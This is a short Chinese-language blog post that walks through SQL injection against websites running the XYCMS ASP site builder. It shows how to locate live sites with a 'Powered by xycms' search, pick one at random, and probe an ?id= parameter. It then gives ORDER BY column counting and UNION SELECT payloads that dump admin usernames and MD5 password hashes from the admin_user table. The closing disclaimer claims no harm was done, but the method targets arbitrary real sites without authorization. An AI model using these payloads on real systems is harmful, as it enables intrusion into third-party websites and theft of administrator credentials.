" />

技术分享

针对XYCMS的注入测试

xycms系统是一款基于ASP开发的商业性建站系统,好多企业站都使用了这个系统,前几天对其进行安全性测试,发现了一些问题,简单记录一下。

首先使用以下关键词搜索使用xycms的站:

Powered by xycms

结果如下:

随便找一个站进行测试:

随便点开一个页面,特征是?id=这种字符串

比如下边这个关于页面

先进行测试,URL后加‘,报错存在注入,使用工具爆出字段和表段(运气好直接爆出字段内容)。

语句猜表段位置:order by 数字,by后边的数字如果在8报错而7正常,就构造语句:

union select 1,2,3,4,5,6,7 from admin_user

然后爆出表段和字段的位置:2,3

构造语句:

union select 1,admin,password,4,5,6,7 from admin_user

爆出账号以及密码的md5值,默认后台通过查询官方文档可得。

声明:本文仅作技术交流之用,并未对测试站点做出危害性行为。

(0)

本文由 易新网 作者:Error404 发表,转载请注明来源!

热评文章

发表评论